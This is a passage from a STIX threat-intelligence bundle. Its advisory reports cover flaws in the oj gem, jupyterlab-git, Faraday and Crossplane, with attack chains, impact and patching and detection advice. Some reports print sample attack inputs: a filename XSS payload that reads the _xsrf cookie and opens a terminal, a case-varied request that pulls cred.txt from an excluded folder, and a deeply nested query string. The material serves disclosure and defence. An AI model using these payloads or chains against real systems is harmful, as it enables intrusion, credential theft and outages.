      "description": "## Overview\n\nThe `oj` Ruby gem, specifically its `Oj.dump` function in object serialization mode, is affected by a heap buffer overflow vulnerability, identified as CVE-2026-54896. This flaw impacts all versions of the gem that include the `ext/oj/dump.h` component, up to and including version 3.17.1. The vulnerability occurs when an application attempts to serialize an `Exception` object using `Oj.dump` with a particularly large `:indent` value (e.g., 5000). The underlying C implementation pre-allocates a buffer based on the object's attributes but fails to account for the substantial additional memory required by the indent string, leading to repeated writes beyond the buffer's boundary. This memory corruption can result in application crashes, denial of service, or potentially enable arbitrary code execution. Defenders should prioritize patching and validating `oj` gem versions in their Ruby applications.\n\n## Attack Chain\n\n1.  **Initial Input**: An attacker sends crafted JSON input to a vulnerable application that utilizes the `oj` gem.\n2.  **Object Deserialization**: The application processes the attacker's input using `Oj.load` in object mode, which creates a Ruby `Exception` object (e.g., `RuntimeError`) from the JSON.\n3.  **Vulnerable Serialization Call**: A legitimate application component subsequently attempts to serialize this `Exception` object back to JSON using `Oj.dump`, with an excessively large `:indent` value (e.g., 5000), which might be attacker-controlled or a misconfigured application setting.\n4.  **Insufficient Buffer Allocation**: Internally, `Oj.dump` (specifically `dump_obj_attrs`) allocates a memory buffer for the serialization output, but this buffer's size is based on the object's attributes and does not adequately account for the combined size of the large indentation strings.\n5.  **Heap Buffer Overflow**: The `fill_indent` function is repeatedly called during serialization to add indentation. When writing the large indent string (e.g., 5000 bytes) into the pre-allocated buffer, it exceeds the available space.\n6.  **Memory Corruption and Impact**: This repeated out-of-bounds writing causes a heap buffer overflow, corrupting adjacent memory. This typically leads to a denial of service through an application crash or, in more advanced scenarios, could be leveraged for arbitrary code execution.\n\n## Impact\n\nThe primary impact of CVE-2026-54896 is memory corruption, leading to the affected Ruby application crashing and resulting in a denial of service. If an attacker can reliably control the execution flow after the overflow, it could potentially be escalated to remote code execution. Although no specific victim counts or targeted sectors have been disclosed, any Ruby application utilizing the `oj` gem in a manner that deserializes untrusted input and subsequently reserializes `Exception` objects with large indent values is at risk.\n\n## Recommendation\n\n*   **Patch CVE-2026-54896**: Immediately upgrade the `oj` gem to version `3.17.2` or later to mitigate CVE-2026-54896.\n*   **Implement Application-Level Controls**: Developers should ensure that user-controlled input does not dictate the `:indent` parameter for `Oj.dump` calls and avoid using excessively large hardcoded indent values.\n*   **Deploy Sigma Rules**: Deploy the provided Sigma rules to your SIEM solution to detect abnormal `ruby` process terminations or crash dump creations, which may indicate exploitation attempts.\n*   **Enable Process Monitoring**: Ensure robust process creation and termination logging is enabled for Ruby applications (e.g., Sysmon on Windows, Auditd on Linux) to capture potential crash-related events.\n",
      "published": "2026-06-19T19:57:25Z",
      "labels": [
        "ruby",
        "vulnerability",
        "heap-overflow"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-35w3-pjm6-wj95"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Valid Accounts",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1078",
          "url": "https://attack.mitre.org/techniques/T1078"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e89385e6-0348-55c7-9bfb-13fe010e8720",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2b7ec287-1619-5345-8836-04f99af62923",
      "target_ref": "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "File and Directory Discovery",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1083",
          "url": "https://attack.mitre.org/techniques/T1083"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b4aea58d-1125-50e6-9642-fa0a05919505",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2b7ec287-1619-5345-8836-04f99af62923",
      "target_ref": "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Local System",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1005",
          "url": "https://attack.mitre.org/techniques/T1005"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--44313927-d6ee-54cb-be8d-8f627c46ed9d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2b7ec287-1619-5345-8836-04f99af62923",
      "target_ref": "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--221fc5c2-8471-5d60-8e8d-42c22fca0c33",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--2b7ec287-1619-5345-8836-04f99af62923",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--2b7ec287-1619-5345-8836-04f99af62923",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "JupyterLab-Git excluded_paths Case-Sensitivity Bypass (CVE-2026-54528)",
      "description": "## Overview\n\nA critical vulnerability, tracked as CVE-2026-54528, has been discovered in `jupyterlab-git` versions up to 0.53.0, a popular Git extension for JupyterLab environments. This flaw allows an authenticated user to bypass security controls designed to restrict access to sensitive directories. The vulnerability stems from the `jupyterlab-git` extension's use of `fnmatch.fnmatchcase()` for enforcing `excluded_paths` configurations. Unlike `fnmatch.fnmatch()`, `fnmatch.fnmatchcase()` is unconditionally case-sensitive. This design choice enables attackers on case-insensitive filesystems (such as Windows NTFS or macOS APFS) to craft URLs with case-varied path segments (e.g., `/project/Secrets` instead of `/project/secrets`), thereby circumventing the exclusion logic and gaining unauthorized read access to Git repositories and file contents within directories explicitly forbidden by administrators. This directly impacts data confidentiality and integrity.\n\n## Attack Chain\n\n1.  An authenticated user with valid access to a JupyterLab instance, running a vulnerable version of `jupyterlab-git` (\u003c=0.53.0), is present on a system with a case-insensitive filesystem (Windows NTFS or macOS APFS).\n2.  An administrator has configured `c.JupyterLabGit.excluded_paths` to deny access to sensitive directories (e.g., `[\"/project/secrets\", \"/project/secrets/*\"]`).\n3.  The attacker identifies a sensitive path that should be excluded (e.g., `/project/secrets`) and crafts an HTTP `POST` request to a `jupyterlab-git` endpoint (e.g., `/git/{path}/status`) using a case-varied version of the path (e.g., `/git/project/Secrets/status`).\n4.  The `jupyterlab-git` backend, specifically `GitHandler.prepare()`, checks the crafted path against `excluded_paths` using `fnmatch.fnmatchcase()`. Due to the unconditional case-sensitivity of `fnmatch.fnmatchcase()`, the path `/project/Secrets` does not match the configured `/project/secrets`, bypassing the exclusion check.\n5.  On the case-insensitive filesystem, the `url2localpath()` function resolves `/project/Secrets` to the same disk location as `/project/secrets`, allowing the request to proceed to the target directory.\n6.  The attacker first confirms the bypass by sending a `POST` request to an information-gathering endpoint like `/git/project/Secrets/status`, which returns a `200 OK` status instead of the expected `404` error.\n7.  With confirmed access, the attacker sends a `POST` request to the `/git/project/Secrets/content` endpoint, providing a filename (e.g., `{\"filename\": \"./cred.txt\", \"reference\": {\"git\": \"HEAD\"}}`), to exfiltrate the contents of sensitive files.\n8.  The JupyterLab server returns the content of the sensitive file (e.g., `sk-PROD-a8f2x9q-LIVE-KEY`), resulting in unauthorized data exposure.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54528 leads to the unauthorized disclosure of sensitive information. An authenticated attacker can access Git history, working tree files, and status information for any directory that an administrator intended to exclude, provided the underlying filesystem is case-insensitive. This directly compromises the confidentiality of data stored in affected repositories, including credentials, proprietary code, or confidential documents. The observed impact demonstrates the exfiltration of a simulated API key from an excluded `secrets` directory. Organizations using `jupyterlab-git` on Windows or macOS systems are at risk, with the potential for widespread data breaches if critical information is stored in such Git-managed directories.\n\n## Recommendation\n\nPrioritize patching and detection to mitigate CVE-2026-54528.\n*   Immediately upgrade `jupyterlab-git` to a version greater than 0.53.0 to apply the fix for CVE-2026-54528.\n*   Deploy the provided Sigma rules \"Detects CVE-2026-54528 Exploitation - JupyterLab-Git Status Bypass\" and \"Detects CVE-2026-54528 Exploitation - JupyterLab-Git Content Exfiltration Bypass\" to your SIEM solution to detect attempts to bypass `excluded_paths` via case-varied URLs.\n*   Ensure detailed `webserver` logging is enabled for all JupyterLab instances to capture HTTP `POST` requests, URI stems, and status codes for analysis.\n*   Review web server logs for `POST` requests to `/git/*/status` and `/git/*/content` endpoints returning `200 OK` where paths contain common sensitive keywords (e.g., `secrets`, `config`) with mixed casing, cross-referencing with your `excluded_paths` configuration.\n",
      "published": "2026-06-19T19:59:42Z",
      "labels": [
        "web-vulnerability",
        "path-traversal",
        "data-exfiltration",
        "jupyterlab",
        "python"
      ],
      "object_refs": [
        "attack-pattern--5817493e-ef12-5a84-adbd-e6ff66112ecd",
        "attack-pattern--dba05e09-3e54-51b6-af3e-58644b62ad7d",
        "attack-pattern--5d4f3482-da19-5c2a-9f5c-b4aebcbb7c04",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-436q-jwfr-rm2h"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6738eed4-baed-5657-b161-5913f3b90777",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--853e2d9c-c410-5272-aea1-80972f5f34ae",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--cc2cbf4f-61a1-5681-bb7a-7eae1d3c0178",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--853e2d9c-c410-5272-aea1-80972f5f34ae",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Steal Web Session Cookie",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1539",
          "url": "https://attack.mitre.org/techniques/T1539"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--2fb3ad02-60cc-51a9-a27f-8f7c82b41f92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--853e2d9c-c410-5272-aea1-80972f5f34ae",
      "target_ref": "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Layer Protocol",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1071",
          "url": "https://attack.mitre.org/techniques/T1071"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--e308bf97-09b3-5cdf-b443-ed949f391b7a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--853e2d9c-c410-5272-aea1-80972f5f34ae",
      "target_ref": "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exfiltration Over C2 Channel",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1041",
          "url": "https://attack.mitre.org/techniques/T1041"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--d621997d-c19b-5f2a-900b-a2ecd66706ec",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--853e2d9c-c410-5272-aea1-80972f5f34ae",
      "target_ref": "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--853e2d9c-c410-5272-aea1-80972f5f34ae",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "JupyterLab Git Extension Stored XSS to RCE (CVE-2026-54527)",
      "description": "## Overview\n\nAmazon Web Services (AWS) Security discovered CVE-2026-54527, a high-severity stored cross-site scripting (XSS) vulnerability within the `jupyterlab-git` JupyterLab extension (versions \u003e= 0.30.0b3, \u003c 0.54.0a1). This flaw specifically resides in the `createHeader()` method of the `PlainTextDiff.ts` component, which insecurely renders Git filenames directly to `innerHTML` without sanitization when displaying diffs for renamed files in commit history. Exploitation requires an adversary to have commit access to a shared Git repository; they craft a malicious filename (e.g., `\u003cimg src=x onerror=eval(atob(\"base64_payload\"))\u003e.py`), rename it in a subsequent commit, and push it. When a victim views the rename diff of this file in the Git History tab, the injected JavaScript executes in their browser, reading the `_xsrf` cookie, opening a JupyterLab terminal via `POST /api/terminals`, and subsequently executing arbitrary shell commands to achieve full Remote Code Execution (RCE). This allows attackers to exfiltrate secrets, credentials, and sensitive data from the victim's JupyterLab environment. The vulnerability impacts organizations utilizing JupyterLab with the vulnerable `jupyterlab-git` extension installed, potentially leading to widespread compromise of development and data science environments.\n\n## Attack Chain\n\n1.  An adversary with commit access to a shared Git repository crafts a file with a malicious filename containing a JavaScript payload (e.g., `\u003cimg src=x onerror=eval(atob(\"base64_payload\"))\u003e.py`).\n2.  The adversary performs a Git commit, renaming the crafted file, and pushes both the file creation and rename commits to the shared Git repository.\n3.  A victim user clones or pulls the repository into their JupyterLab environment.\n4.  The victim navigates to the Git History tab within JupyterLab, clicks the commit containing the rename, and then clicks the renamed malicious file to view its diff.\n5.  JupyterLab's `PlainTextDiff.ts` component, specifically the `createHeader()` method, renders the unsanitized malicious filename directly into the Document Object Model (DOM) via `innerHTML`, executing the embedded JavaScript payload in the victim's browser session.\n6.  The executed JavaScript reads the victim's `_xsrf` cookie, constructs and sends a `POST` request to the JupyterLab server's `/api/terminals` endpoint to open a new terminal session.\n7.  The JavaScript establishes a WebSocket connection to the newly created terminal and sends arbitrary shell commands for execution on the underlying JupyterLab server.\n8.  The shell commands execute with the privileges of the JupyterLab server process, leading to Remote Code Execution (RCE) and potential exfiltration of credentials or sensitive data from the victim's environment.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54527 leads to full Remote Code Execution (RCE) on the JupyterLab server where the victim's session is running. This grants an attacker unauthorized access to the victim's code, data, environment variables, and any credentials accessible from that environment. Attackers can leverage this RCE to exfiltrate sensitive information, install backdoors, move laterally within the network, or disrupt development and data science workflows. The attack vectors are widespread across any organization using JupyterLab with the vulnerable `jupyterlab-git` extension in a collaborative Git environment.\n\n## Recommendation\n\n1.  Immediately patch the `jupyterlab-git` extension to a version equal to or greater than 0.54.0a1 to remediate CVE-2026-54527.\n2.  Deploy the Sigma rules \"Detects CVE-2026-54527 Exploitation — JupyterLab Terminal Creation\" and \"Detects CVE-2026-54527 Exploitation — Suspicious JupyterLab Child Process\" to your SIEM and tune them for your environment's baseline JupyterLab activity.\n3.  Enable comprehensive `webserver` logging for all JupyterLab instances to capture `POST` requests to `/api/terminals` and other suspicious API endpoints, enabling the \"Detects CVE-2026-54527 Exploitation — JupyterLab Terminal Creation\" rule.\n4.  Enable `process_creation` logging on all servers hosting JupyterLab instances to monitor for unusual child processes spawned by JupyterLab or Python processes, enabling the \"Detects CVE-2026-54527 Exploitation — Suspicious JupyterLab Child Process\" rule.\n",
      "published": "2026-06-19T20:01:30Z",
      "labels": [
        "xss",
        "rce",
        "jupyterlab",
        "git",
        "web-vulnerability",
        "software-supply-chain",
        "ghsa"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
        "attack-pattern--f01db0f8-2292-53f2-9bdc-d0cfc660a37a",
        "attack-pattern--5c7b2996-04b0-587c-b2de-8b20afcc2de6",
        "attack-pattern--4cb06bc1-a177-59d7-804c-95f4bab7e7e1"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f962-v9hr-pfg5"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Endpoint Denial of Service",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499",
          "url": "https://attack.mitre.org/techniques/T1499"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--049d3267-b2bf-5406-933f-7dc55a8b777d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--bf46b915-3a65-5c8f-8564-45c175dc949a",
      "target_ref": "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--bf46b915-3a65-5c8f-8564-45c175dc949a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Faraday: Uncontrolled Recursion in NestedParamsEncoder Allows Stack Exhaustion DoS",
      "description": "## Overview\n\nThe `Faraday::NestedParamsEncoder` component within the Faraday Ruby HTTP client library, affecting versions up to `2.14.2`, contains a critical vulnerability (CVE-2026-54297) that allows for a denial-of-service (DoS) attack. This vulnerability stems from uncontrolled recursion in its `dehash` routine when processing deeply nested query parameters, such as `a[x][x][x]...[x]=1`. An attacker can send a specially crafted, relatively small (around 9.4 KB) HTTP request containing such a query string to an application that utilizes Faraday for parsing or building URLs. This input causes the Ruby process to build an excessively deep `Hash` structure, exhausting the call stack and leading to a `SystemStackError`, effectively crashing the calling thread or worker. This issue impacts the availability of affected applications and does not require authentication or user interaction to exploit.\n\n## Attack Chain\n\n1.  An unauthenticated attacker crafts a malicious HTTP request containing an excessively deeply nested query parameter, for example, `GET /search?a[x][x][x]...[x]=1 HTTP/1.1`.\n2.  The vulnerable application receives the HTTP request and, as part of its processing, passes the attacker-controlled query string to a Faraday function like `Faraday::Utils.parse_nested_query` or `conn.build_url`.\n3.  Faraday's `NestedParamsEncoder`, specifically the `dehash` internal routine, begins recursively processing the deeply nested query parameter structure.\n4.  Due to the absence of a maximum nesting depth limit within the `dehash` function, the recursion depth is solely controlled by the attacker's input.\n5.  The deep recursion exhausts the Ruby process's call stack.\n6.  The Ruby interpreter raises an uncaught `SystemStackError` (indicating \"stack level too deep\").\n7.  The `SystemStackError` causes the application's calling thread or worker to crash, leading to a denial-of-service condition for that specific process or the entire application.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-54297 results in a denial-of-service against the targeted application. A small, crafted query string of approximately 9.4 KB can trigger a `SystemStackError` in the Ruby runtime, crashing the process or thread handling the request. Repeated requests with such payloads can lead to a prolonged outage for any application that exposes Faraday's parameter parsing or URL-building paths to untrusted input. The vulnerability does not allow for remote code execution, authentication bypass, or data disclosure; its confirmed impact is limited to availability loss.\n\n## Recommendation\n\n*   **Upgrade Faraday:** Immediately upgrade the Faraday gem to a patched version once available. Monitor the official Faraday GitHub repository and RubyGems for security advisories and releases addressing CVE-2026-54297.\n*   **Implement web application firewall (WAF) rules:** Deploy WAF rules to detect and block HTTP requests containing an excessive number of `[x]` or similar nested array/hash markers in query parameters, as indicated in the `Detects CVE-2026-54297 exploitation` Sigma rule.\n*   **Application-level input validation:** Implement strict input validation in applications that utilize Faraday to parse or build URLs from external input, specifically limiting the maximum depth of nested query parameters.\n*   **Deploy the Sigma rules in this brief to your SIEM:** Tune the `Detects CVE-2026-54297 exploitation` rule for your environment to identify attempts to exploit this vulnerability.\n",
      "published": "2026-06-19T20:02:35Z",
      "labels": [
        "denial-of-service",
        "web-vulnerability",
        "ruby",
        "faraday",
        "ghsa",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--15983b63-d99e-55d9-9324-bf68f3de5563"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-98m9-hrrm-r99r"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54297"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Supply Chain Compromise",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1195",
          "url": "https://attack.mitre.org/techniques/T1195"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--7b8bdf03-a4aa-5d24-b4fb-d20af68b9638",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0fef5ed9-2471-50a4-904b-407fe01c680d",
      "target_ref": "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Impair Defenses",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1562",
          "url": "https://attack.mitre.org/techniques/T1562"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--64a63d8a-b100-56cc-8e8a-020214471c61",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--0fef5ed9-2471-50a4-904b-407fe01c680d",
      "target_ref": "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--0fef5ed9-2471-50a4-904b-407fe01c680d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Crossplane: Signature verification TOCTOU allows installing unverified package content via mutable tag",
      "description": "## Overview\n\nA critical time-of-check to time-of-use (TOCTOU) vulnerability has been identified in Crossplane's package manager, affecting versions `crossplane/v2` from `2.3.0-rc.0` up to `2.3.2`, versions `crossplane/v2` up to `2.2.2`, and `crossplane` up to `1.21.0-rc.0`. This flaw allows an attacker controlling an OCI registry to bypass package signature verification, leading to the installation of unverified content. The vulnerability arises because Crossplane resolves mutable tag references (e.g., `latest` or semantic versions) separately for signature verification and for subsequent package installation. This provides a window for a malicious registry to serve a benign, signed image for the verification step and then swap it for an unsigned, malicious image during the installation step. The issue specifically impacts users who configure signature verification, install packages using tag references instead of digests, and source packages from registries they do not control, posing a significant supply chain risk for cloud-native environments.\n\n## Attack Chain\n\n1.  **Attacker Setup**: An attacker gains control over a target OCI registry or successfully compromises its package serving mechanism to manipulate content for specific mutable tags.\n2.  **Malicious Package Crafting**: The attacker prepares two distinct versions of a package: a benign, correctly signed version and a malicious, unsigned (or improperly signed) version containing arbitrary malicious code or configuration. Both versions are associated with the same mutable package tag.\n3.  **Crossplane Verification Request**: A Crossplane instance, configured to enforce package signature verification and attempting to install the package using a mutable tag (e.g., `my-package:1.0.0`), initiates a network request to the OCI registry to fetch package metadata for signature verification.\n4.  **Benign Package Served for Verification**: The malicious OCI registry detects the verification request and serves the benign, correctly signed package version.\n5.  **Signature Verification Success**: Crossplane receives the benign package and successfully verifies its signature using `cosign`, incorrectly confirming the package's integrity.\n6.  **Crossplane Installation Request**: Immediately following successful signature verification, Crossplane makes a separate, second network request to the same OCI registry to retrieve the package content for actual installation.\n7.  **Malicious Package Served for Installation**: The malicious OCI registry intercepts this second request and, exploiting the TOCTOU window, serves the malicious, unverified package version instead of the benign one.\n8.  **Malicious Package Installation**: Crossplane installs the unverified, malicious package content into the Kubernetes cluster. This can lead to supply chain compromise, unauthorized resource provisioning, privilege escalation, or arbitrary code execution within the cluster environment.\n\n## Impact\n\nSuccessful exploitation of this TOCTOU vulnerability can lead to severe supply chain compromise within a Kubernetes environment managed by Crossplane. Attackers can inject arbitrary, unverified code or configurations into a cluster, bypassing critical security controls designed for package integrity. This could result in unauthorized resource creation, privilege escalation, data exfiltration, or complete cluster takeover, depending on the malicious payload delivered. Organizations relying on Crossplane for infrastructure as code, especially those with stringent security requirements like financial, government, or critical infrastructure sectors, are at significant risk if they meet the specific conditions for vulnerability (signature verification enabled, tag references used, and untrusted registries). The vulnerability fundamentally undermines trust in installed components.\n\n## Recommendation\n\n*   **Mitigate by using Digests**: Immediately update Crossplane package installation configurations to use immutable image digests (e.g., `my-package@sha256:abcd...`) instead of mutable tags to ensure content integrity.\n*   **Upgrade Crossplane**: Prioritize upgrading all affected Crossplane instances to a fixed version (`v2.3.3`, `v2.2.3`, or later) as soon as available, as referenced in the GHSA-wfqx-gjrf-g28r advisory.\n*   **Deploy Rule 1**: Deploy the \"Crossplane Controller Outbound to Unverified OCI Registry\" Sigma rule to your SIEM to monitor suspicious network connections from Crossplane controllers to untrusted OCI registries.\n*   **Deploy Rule 2**: Implement the \"Suspicious Crossplane Controller Process Activity\" Sigma rule to detect unusual process execution or file modifications by Crossplane or its subprocesses that might indicate malicious package content.\n",
      "published": "2026-06-19T20:55:23Z",
      "labels": [
        "crossplane",
        "supply-chain",
        "vulnerability",
        "cloud-native",
        "kubernetes",
        "toctou"
      ],
      "object_refs": [
        "attack-pattern--a2bbc1a7-f032-500e-86d9-c38716e236cb",
        "attack-pattern--c70a2e65-c065-55f2-9e9e-0ff6d591826b"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-wfqx-gjrf-g28r"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Use Alternate Authentication Material",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1550",
          "url": "https://attack.mitre.org/techniques/T1550"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--3f5d0abf-2a93-5ff9-907c-2f386c799c83",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--f6170eee-8e84-5885-8cfa-82110cf2abe2",
      "target_ref": "attack-pattern--d1ed5799-980b-5d2c-bc5a-beb8d47d4d92"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--f6170eee-8e84-5885-8cfa-82110cf2abe2",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "CoreWCF SAML Authentication Bypass Vulnerability (CVE-2026-54781)",
